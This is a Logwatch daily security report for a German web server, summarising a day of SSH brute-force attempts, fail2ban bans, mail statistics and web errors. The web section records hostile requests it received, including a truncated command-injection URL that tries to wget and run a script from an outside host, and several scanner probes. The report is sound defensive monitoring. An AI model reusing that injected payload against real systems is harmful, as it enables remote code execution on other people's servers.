Logwatch for h2361197.stratoserver.net (Linux)

Mittwoch, 7 August 2019


 
 ################### Logwatch 7.4.0 (03/01/11) #################### 
        Processing Initiated: Wed Aug  7 04:42:10 2019
        Date Range Processed: yesterday
                              ( 2019-Aug-06 )
                              Period is day.
        Detail Level of Output: 0
        Type of Output/Format: mail / text
        Logfiles for Host: h2361197.stratoserver.net
 ################################################################## 
 
 --------------------- fail2ban-messages Begin ------------------------ 

 Banned services with Fail2Ban:				 Bans:Unbans
    ssh:                                                    [235:238]
 
 ---------------------- fail2ban-messages End ------------------------- 

 
 --------------------- httpd Begin ------------------------ 

 
 Connection attempts using mod_proxy:
    123.163.114.57 -> zapf.wiki:443: 1 Time(s)
    60.191.52.254 -> zapf.wiki:443: 1 Time(s)
 
 A total of 3 sites probed the server 
    5.188.210.101
    66.240.192.138
    91.185.211.27
 
 Requests with error response codes
    400 Bad Request
       null: 11 Time(s)
       zapf.wiki:443: 2 Time(s)
       /: 1 Time(s)
       /a2billing/admin/Public/PP_error.php?c=accessdenied: 1 Time(s)
       /login.cgi?cli=aa%20aa%27;wget%20http://54 ... h%20/tmp/kh%27$: 1 Time(s)
       /recordings/: 1 Time(s)
       /w00tw00t.at.ISC.SANS.DFind:): 1 Time(s)
       http://5.188.210.101/echo.php: 1 Time(s)
       mstshash=Administr: 1 Time(s)
    404 Not Found
       /robots.txt: 29 Time(s)
       /berlin/apple-touch-icon.png: 12 Time(s)
       /wp-login.php: 3 Time(s)
       /reader/2016_SoSe_Konstanz_lang.pdf%7CLangversion: 1 Time(s)
       /reader/2016_sose_konstanz_lang.pdf: 1 Time(s)
       /reader/2017_SoSe_Berlin_vorlaeufig.pdf%7C: 1 Time(s)
       /resolutionen/sose12/Reso_Interdisziplinae ... f;Stellungnahme: 1 Time(s)
       /resolutionen/sose14/reso_sose14_zusammenarbeitzapf-che.pdf: 1 Time(s)
       /sites/default/files/2012_WiSe_Karlsruhe.pdf: 1 Time(s)
       /sites/default/files/Empfehlungen_der_ZaPF ... 7CStellungnahme: 1 Time(s)
    500 Internal Server Error
       /: 96 Time(s)
       /robots.txt: 40 Time(s)
       //recordings/misc/play_page.php: 1 Time(s)
       /a2billing/admin/Public/PP_error.php?c=accessdenied: 1 Time(s)
       /recordings/: 1 Time(s)
       /secure/ContactAdministrators!default.jspa: 1 Time(s)
    502 Bad Gateway
       /berlin/newsletter/newsletter-subscribe: 1 Time(s)
 
 ---------------------- httpd End ------------------------- 

 
 --------------------- pam_unix Begin ------------------------ 

 sshd:
    Authentication Failures:
       unknown (80.211.94.183): 99 Time(s)
       unknown (220.76.205.178): 89 Time(s)
       unknown (177.73.140.62): 88 Time(s)
       unknown (200.199.69.75): 86 Time(s)
       unknown (123.207.140.248): 85 Time(s)
       unknown (183.129.150.2): 78 Time(s)
       unknown (95.231.139.36): 69 Time(s)
       unknown (10.ip-54-38-184.eu): 63 Time(s)
       unknown (103.236.253.28): 63 Time(s)
       unknown (43.226.38.26): 63 Time(s)
       unknown (115.84.121.80): 62 Time(s)
       unknown (mail.desu.ninja): 62 Time(s)
       unknown (113.105.129.35): 61 Time(s)
       unknown (138.197.174.3): 61 Time(s)
       unknown (cm-84.208.62.38.getinternet.no): 61 Time(s)
       unknown (host-188.117.151.197.static.3s.pl): 61 Time(s)
       unknown (103.61.37.165): 60 Time(s)
       unknown (62.234.97.45): 59 Time(s)
       unknown (36.112.137.55): 55 Time(s)
       unknown (222.233.53.132): 54 Time(s)
       unknown (89.38.147.215): 49 Time(s)
       unknown (11.180.167.107.bc.googleusercontent.com): 46 Time(s)
       unknown (200.216.30.2): 46 Time(s)
       unknown (106.12.128.24): 43 Time(s)
       unknown (106.13.47.10): 42 Time(s)
       unknown (87.242.240.35.bc.googleusercontent.com): 41 Time(s)
       unknown (163.172.157.162): 28 Time(s)
       unknown (165.52.187.35.bc.googleusercontent.com): 21 Time(s)
       unknown (101.251.237.228): 20 Time(s)
       unknown (59.49.99.124): 20 Time(s)
       unknown (modemcable077.230-161-184.mc.videotron.ca): 19 Time(s)
       root (123.207.140.248): 14 Time(s)
       unknown (115.133.207.39): 12 Time(s)
       unknown (122-58-175-31-adsl.sparkbb.co.nz): 12 Time(s)
       unknown (123.206.13.46): 12 Time(s)
       root (183.129.150.2): 11 Time(s)
       root (200.199.69.75): 11 Time(s)
       root (103.61.37.165): 10 Time(s)
       root (177.73.140.62): 10 Time(s)
       root (106.12.128.24): 9 Time(s)
       root (200.216.30.2): 9 Time(s)
       root (mail.desu.ninja): 9 Time(s)
       unknown (128.199.118.81): 9 Time(s)
       root (10.ip-54-38-184.eu): 7 Time(s)
       root (103.236.253.28): 7 Time(s)
       root (222.233.53.132): 7 Time(s)
       root (43.226.38.26): 7 Time(s)
       root (62.234.97.45): 7 Time(s)
       root (89.38.147.215): 7 Time(s)
       root (11.180.167.107.bc.googleusercontent.com): 6 Time(s)
       root (115.229.192.109): 6 Time(s)
       root (138.197.174.3): 6 Time(s)
       root (180.170.75.82): 6 Time(s)
       root (182.245.23.127): 6 Time(s)
       root (218.92.0.143): 6 Time(s)
       root (87.242.240.35.bc.googleusercontent.com): 6 Time(s)
       root (95.231.139.36): 6 Time(s)
       unknown (114.237.225.204): 6 Time(s)
       root (106.13.47.10): 5 Time(s)
       root (113.105.129.35): 5 Time(s)
       root (115.84.121.80): 5 Time(s)
       root (220.76.205.178): 5 Time(s)
       root (59.49.99.124): 5 Time(s)
       root (115.133.207.39): 4 Time(s)
       root (165.52.187.35.bc.googleusercontent.com): 4 Time(s)
       root (36.112.137.55): 4 Time(s)
       root (cm-84.208.62.38.getinternet.no): 4 Time(s)
       root (modemcable077.230-161-184.mc.videotron.ca): 4 Time(s)
       root (101.251.237.228): 3 Time(s)
       root (163.172.157.162): 3 Time(s)
       root (host-188.117.151.197.static.3s.pl): 3 Time(s)
       unknown (118.24.99.163): 3 Time(s)
       unknown (118.25.128.19): 3 Time(s)
       unknown (119.196.83.2): 3 Time(s)
       unknown (121.142.111.98): 3 Time(s)
       unknown (139.59.35.117): 3 Time(s)
       unknown (92.63.194.26): 3 Time(s)
       postgres (11.180.167.107.bc.googleusercontent.com): 2 Time(s)
       postgres (183.129.150.2): 2 Time(s)
       postgres (200.199.69.75): 2 Time(s)
       unknown (193.32.163.182): 2 Time(s)
       unknown (222.120.192.106): 2 Time(s)
       unknown (59.25.197.154): 2 Time(s)
       unknown (61.183.35.44): 2 Time(s)
       unknown (82-64-140-9.subs.proxad.net): 2 Time(s)
       backup (115.84.121.80): 1 Time(s)
       backup (123.206.13.46): 1 Time(s)
       backup (183.129.150.2): 1 Time(s)
       backup (220.76.205.178): 1 Time(s)
       backup (36.112.137.55): 1 Time(s)
       bin (138.197.174.3): 1 Time(s)
       bin (177.73.140.62): 1 Time(s)
       bin (192.ip-51-68-123.eu): 1 Time(s)
       jan (95.231.139.36): 1 Time(s)
       list (113.105.129.35): 1 Time(s)
       mail (101.251.237.228): 1 Time(s)
       mail (113.105.129.35): 1 Time(s)
       mail (128.199.118.81): 1 Time(s)
       man (103.236.253.28): 1 Time(s)
       man (220.76.205.178): 1 Time(s)
       messagebus (183.129.150.2): 1 Time(s)
       mysql (104.236.22.133): 1 Time(s)
       mysql (177.73.140.62): 1 Time(s)
       mysql (222.233.53.132): 1 Time(s)
       mysql (cm-84.208.62.38.getinternet.no): 1 Time(s)
       postgres (103.236.253.28): 1 Time(s)
       postgres (103.61.37.165): 1 Time(s)
       postgres (200.216.30.2): 1 Time(s)
       postgres (43.226.38.26): 1 Time(s)
       postgres (62.234.97.45): 1 Time(s)
       postgres (89.38.147.215): 1 Time(s)
       postgres (95.231.139.36): 1 Time(s)
       postgres (mail.desu.ninja): 1 Time(s)
       postgres (modemcable077.230-161-184.mc.videotron.ca): 1 Time(s)
       root (112.85.42.182): 1 Time(s)
       root (122-58-175-31-adsl.sparkbb.co.nz): 1 Time(s)
       root (122.165.149.75): 1 Time(s)
       root (123.206.13.46): 1 Time(s)
       root (125.212.212.239): 1 Time(s)
       root (128.199.118.81): 1 Time(s)
       root (128.199.142.0): 1 Time(s)
       root (13.69.126.114): 1 Time(s)
       root (194.15.36.216): 1 Time(s)
       root (218.92.0.163): 1 Time(s)
       root (60.191.23.27): 1 Time(s)
       root (80.211.94.183): 1 Time(s)
       root (jimmytremblaybernier.ca): 1 Time(s)
       sshd (103.61.37.165): 1 Time(s)
       sync (11.180.167.107.bc.googleusercontent.com): 1 Time(s)
       sync (183.129.150.2): 1 Time(s)
       unknown (104.236.52.94): 1 Time(s)
       unknown (104.248.237.238): 1 Time(s)
       unknown (106.51.77.214): 1 Time(s)
       unknown (107.170.235.19): 1 Time(s)
       unknown (115.77.187.18): 1 Time(s)
       unknown (115.91.68.211): 1 Time(s)
       unknown (118.187.6.24): 1 Time(s)
       unknown (119.75.24.68): 1 Time(s)
       unknown (128.199.47.148): 1 Time(s)
       unknown (128.199.95.60): 1 Time(s)
       unknown (13.95.237.210): 1 Time(s)
       unknown (13.ip-51-68-44.eu): 1 Time(s)
       unknown (13.ip-51-75-170.eu): 1 Time(s)
       unknown (134.175.45.78): 1 Time(s)
       unknown (134.209.100.31): 1 Time(s)
       unknown (134.209.48.248): 1 Time(s)
       unknown (134.209.7.179): 1 Time(s)
       unknown (136.ip-51-77-146.eu): 1 Time(s)
       unknown (139.199.82.171): 1 Time(s)
       unknown (149.ip-51-254-206.eu): 1 Time(s)
       unknown (149.ip-51-77-195.eu): 1 Time(s)
       unknown (157.230.144.158): 1 Time(s)
       unknown (159.65.112.93): 1 Time(s)
       unknown (159.89.235.61): 1 Time(s)
       unknown (163.172.187.30): 1 Time(s)
       unknown (165.227.122.7): 1 Time(s)
       unknown (167.71.6.221): 1 Time(s)
       unknown (178.128.42.36): 1 Time(s)
       unknown (178.128.86.127): 1 Time(s)
       unknown (178.62.108.111): 1 Time(s)
       unknown (182.48.84.6): 1 Time(s)
       unknown (187.103.74.106): 1 Time(s)
       unknown (187.95.124.230): 1 Time(s)
       unknown (188.166.51.14): 1 Time(s)
       unknown (192.241.249.53): 1 Time(s)
       unknown (197.42.165.15): 1 Time(s)
       unknown (2.ip-91-134-143.eu): 1 Time(s)
       unknown (201.16.212.241): 1 Time(s)
       unknown (202.131.231.210): 1 Time(s)
       unknown (206.189.94.198): 1 Time(s)
       unknown (206.81.11.216): 1 Time(s)
       unknown (206.81.12.209): 1 Time(s)
       unknown (242.ip-54-38-157.eu): 1 Time(s)
       unknown (248.ip-51-79-52.net): 1 Time(s)
       unknown (30.ip-51-77-58.eu): 1 Time(s)
       unknown (41.ip-51-75-142.eu): 1 Time(s)
       unknown (46.101.43.224): 1 Time(s)
       unknown (5.ip-158-69-198.net): 1 Time(s)
       unknown (61.72.255.26): 1 Time(s)
       unknown (62.234.128.242): 1 Time(s)
       unknown (82.223.69.108): 1 Time(s)
       unknown (85.ip-149-202-59.eu): 1 Time(s)
       unknown (cultadv.cloud): 1 Time(s)
       unknown (device-proxy.hosting.autoenterprise.com.ua): 1 Time(s)
       unknown (host210.sub-63-41-9.myvzw.com): 1 Time(s)
       unknown (irarott.com): 1 Time(s)
       unknown (mx-ll-180.183.54-51.dynamic.3bb.co.th): 1 Time(s)
       unknown (ns328430.ip-37-187-113.eu): 1 Time(s)
       unknown (pppoe-78-29-116-175.san.ru): 1 Time(s)
       unknown (v157-7-197-105.myvps.jp): 1 Time(s)
       unknown (www.gogoski.fr): 1 Time(s)
       www-data (103.236.253.28): 1 Time(s)
       www-data (43.226.38.26): 1 Time(s)
    Invalid Users:
       Unknown Account: 1894 Time(s)
 
 
 ---------------------- pam_unix End ------------------------- 

 
 --------------------- Postfix Begin ------------------------ 

      300   Miscellaneous warnings  
 
   18.451K  Bytes accepted                              18,894
   18.451K  Bytes sent via SMTP                         18,894
 ========   ==================================================
 
        1   Accepted                                   100.00%
 --------   --------------------------------------------------
        1   Total                                      100.00%
 ========   ==================================================
 
      289   4xx Reject relay denied                    100.00%
 --------   --------------------------------------------------
      289   Total 4xx Rejects                          100.00%
 ========   ==================================================
 
      524   Connections             
      298   Connections lost (inbound) 
      524   Disconnections          
        1   Removed from queue      
        1   Sent via SMTP           
 
        1   Timeouts (inbound)      
 
 
 ---------------------- Postfix End ------------------------- 

 
 --------------------- sendmail-largeboxes (large mail spool files) Begin
------------------------ 

 Large Mailbox threshold: 40MB (41943040 bytes)
  Warning: Large mailbox: mailman.gz (1747199807)
  Warning: Large mailbox: mailman (235703599967)
 
 ---------------------- sendmail-largeboxes (large mail spool files) End
------------------------- 

 
 --------------------- SSHD Begin ------------------------ 

 
 Disconnecting after too many authentication failures for user:
    invalid : 1 Time(s)
    root : 4 Time(s)
 
 Failed logins from:
    13.69.126.114: 1 time
    35.187.52.165 (165.52.187.35.bc.googleusercontent.com): 4 times
    35.240.242.87 (87.242.240.35.bc.googleusercontent.com): 6 times
    36.112.137.55: 5 times
    43.226.38.26: 9 times
    51.68.123.192 (192.ip-51-68-123.eu): 1 time
    54.38.184.10 (10.ip-54-38-184.eu): 7 times
    59.49.99.124: 5 times
    60.191.23.27: 1 time
    62.234.97.45: 8 times
    80.211.94.183 (host183-94-211-80.serverdedicati.aruba.it): 1 time
    84.208.62.38 (cm-84.208.62.38.getinternet.no): 5 times
    89.38.147.215 (host215-147-38-89.static.arubacloud.com): 8 times
    95.231.139.36 (host36-139-static.231-95-b.business.telecomitalia.it): 8 times
    101.251.237.228: 4 times
    103.61.37.165: 12 times
    103.236.253.28: 10 times
    104.236.22.133: 1 time
    106.12.128.24: 9 times
    106.13.47.10: 5 times
    107.167.180.11 (11.180.167.107.bc.googleusercontent.com): 9 times
    112.85.42.182: 3 times
    113.105.129.35: 7 times
    115.84.121.80: 6 times
    115.133.207.39: 4 times
    115.229.192.109: 6 times
    122.58.175.31 (122-58-175-31-adsl.sparkbb.co.nz): 1 time
    122.165.149.75 (abts-tn-static-075.149.165.122.airtelbroadband.in): 1 time
    123.206.13.46: 2 times
    123.207.140.248: 14 times
    125.212.212.239: 1 time
    128.199.118.81: 2 times
    128.199.142.0: 1 time
    138.197.174.3: 7 times
    142.4.16.20 (mail.desu.ninja): 10 times
    158.69.192.147 (jimmytremblaybernier.ca): 1 time
    163.172.157.162 (162-157-172-163.rev.cloud.scaleway.com): 3 times
    177.73.140.62: 12 times
    180.170.75.82: 6 times
    182.245.23.127: 6 times
    183.129.150.2: 16 times
    184.161.230.77 (modemcable077.230-161-184.mc.videotron.ca): 5 times
    188.117.151.197 (host-188.117.151.197.static.3s.pl): 3 times
    194.15.36.216 (mc.warriorking.it): 1 time
    200.199.69.75 (mail2.usinasclotilde.com.br): 13 times
    200.216.30.2: 10 times
    218.92.0.143: 6 times
    218.92.0.163: 2 times
    220.76.205.178: 7 times
    222.233.53.132: 8 times
 
 Illegal users from:
    undef: 1393 times
    13.95.237.210: 1 time
    35.187.52.165 (165.52.187.35.bc.googleusercontent.com): 21 times
    35.240.242.87 (87.242.240.35.bc.googleusercontent.com): 41 times
    36.112.137.55: 55 times
    37.187.113.229 (ns328430.ip-37-187-113.eu): 1 time
    43.226.38.26: 63 times
    45.55.167.217 (irarott.com): 1 time
    46.101.43.224: 1 time
    51.68.44.13 (13.ip-51-68-44.eu): 1 time
    51.75.142.41 (41.ip-51-75-142.eu): 1 time
    51.75.170.13 (13.ip-51-75-170.eu): 1 time
    51.77.58.30 (30.ip-51-77-58.eu): 1 time
    51.77.146.136 (136.ip-51-77-146.eu): 1 time
    51.77.195.149 (149.ip-51-77-195.eu): 1 time
    51.79.52.248 (248.ip-51-79-52.net): 1 time
    51.254.37.192 (www.gogoski.fr): 1 time
    51.254.206.149 (149.ip-51-254-206.eu): 1 time
    54.38.157.242 (242.ip-54-38-157.eu): 1 time
    54.38.184.10 (10.ip-54-38-184.eu): 63 times
    59.25.197.154: 2 times
    59.49.99.124: 20 times
    61.72.255.26: 1 time
    61.183.35.44: 2 times
    62.234.97.45: 59 times
    62.234.128.242: 1 time
    63.41.9.210 (host210.sub-63-41-9.myvzw.com): 1 time
    78.29.116.175 (PPPoE-78-29-116-175.san.ru): 1 time
    80.211.94.183 (host183-94-211-80.serverdedicati.aruba.it): 99 times
    80.211.133.238 (cultadv.cloud): 1 time
    82.64.140.9 (82-64-140-9.subs.proxad.net): 2 times
    82.223.69.108: 1 time
    84.208.62.38 (cm-84.208.62.38.getinternet.no): 61 times
    89.38.147.215 (host215-147-38-89.static.arubacloud.com): 49 times
    91.134.143.2 (2.ip-91-134-143.eu): 1 time
    92.63.194.26: 3 times
    95.231.139.36 (host36-139-static.231-95-b.business.telecomitalia.it): 69 times
    101.251.237.228: 20 times
    103.61.37.165: 60 times
    103.236.253.28: 63 times
    104.236.52.94: 1 time
    104.248.237.238: 1 time
    106.12.128.24: 43 times
    106.13.47.10: 42 times
    106.51.77.214 (broadband.actcorp.in): 1 time
    107.167.180.11 (11.180.167.107.bc.googleusercontent.com): 46 times
    107.170.235.19: 1 time
    113.105.129.35: 61 times
    114.237.225.204 (204.225.237.114.broad.lyg.js.dynamic.163data.com.cn): 6 times
    115.77.187.18 (adsl.viettel.vn): 1 time
    115.84.121.80: 62 times
    115.91.68.211: 1 time
    115.133.207.39: 12 times
    118.24.99.163: 3 times
    118.25.128.19: 3 times
    118.187.6.24: 1 time
    119.75.24.68: 1 time
    119.196.83.2: 3 times
    121.142.111.98: 3 times
    122.58.175.31 (122-58-175-31-adsl.sparkbb.co.nz): 12 times
    123.206.13.46: 12 times
    123.207.140.248: 85 times
    128.199.47.148 (rentio.2017.09.18): 1 time
    128.199.95.60: 1 time
    128.199.118.81: 9 times
    134.175.45.78: 1 time
    134.209.7.179: 1 time
    134.209.48.248: 1 time
    134.209.100.31: 1 time
    138.197.174.3: 61 times
    139.59.35.117: 3 times
    139.199.82.171: 1 time
    142.4.16.20 (mail.desu.ninja): 62 times
    142.93.141.59 (device-proxy.hosting.autoenterprise.com.ua): 1 time
    149.202.59.85 (85.ip-149-202-59.eu): 1 time
    157.7.197.105 (v157-7-197-105.myvps.jp): 1 time
    157.230.144.158: 1 time
    158.69.198.5 (5.ip-158-69-198.net): 1 time
    159.65.112.93: 1 time
    159.89.235.61: 1 time
    163.172.157.162 (162-157-172-163.rev.cloud.scaleway.com): 28 times
    163.172.187.30 (30-187-172-163.rev.cloud.scaleway.com): 1 time
    165.227.122.7: 1 time
    167.71.6.221: 1 time
    177.73.140.62: 88 times
    178.62.108.111: 1 time
    178.128.42.36: 1 time
    178.128.86.127: 1 time
    180.183.54.51 (mx-ll-180.183.54-51.dynamic.3bb.co.th): 1 time
    182.48.84.6: 1 time
    183.129.150.2: 78 times
    184.161.230.77 (modemcable077.230-161-184.mc.videotron.ca): 19 times
    187.95.124.230 (230.124.95.187.static.copel.net): 1 time
    187.103.74.106 (106.74.103.187.surfix.com.br): 1 time
    188.117.151.197 (host-188.117.151.197.static.3s.pl): 61 times
    188.166.51.14: 1 time
    192.241.249.53: 1 time
    193.32.163.182 (hosting-by.cloud-home.me): 2 times
    197.42.165.15 (host-197.42.165.15.tedata.net): 1 time
    200.199.69.75 (mail2.usinasclotilde.com.br): 86 times
    200.216.30.2: 46 times
    201.16.212.241: 1 time
    202.131.231.210: 1 time
    206.81.11.216: 1 time
    206.81.12.209: 1 time
    206.189.94.198: 1 time
    220.76.205.178: 89 times
    222.120.192.106: 2 times
    222.233.53.132: 54 times
 
 **Unmatched Entries**
 Disconnecting: Change of username or service not allowed: (admin,ssh-connection) ->
(user,ssh-connection) [preauth] : 1 time(s)
 fatal: no matching cipher found: client
aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,twofish-cbc,arcfour server
aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com
[preauth] : 2 time(s)
 
 ---------------------- SSHD End ------------------------- 

 
 --------------------- Disk Space Begin ------------------------ 

 Filesystem      Size  Used Avail Use% Mounted on
 /dev/vzfs       400G  242G  159G  61% /
 
 
 ---------------------- Disk Space End ------------------------- 

 
 ###################### Logwatch End #########################

2025

2024

2023

2022

2021

2020

2019

2018

2017

2016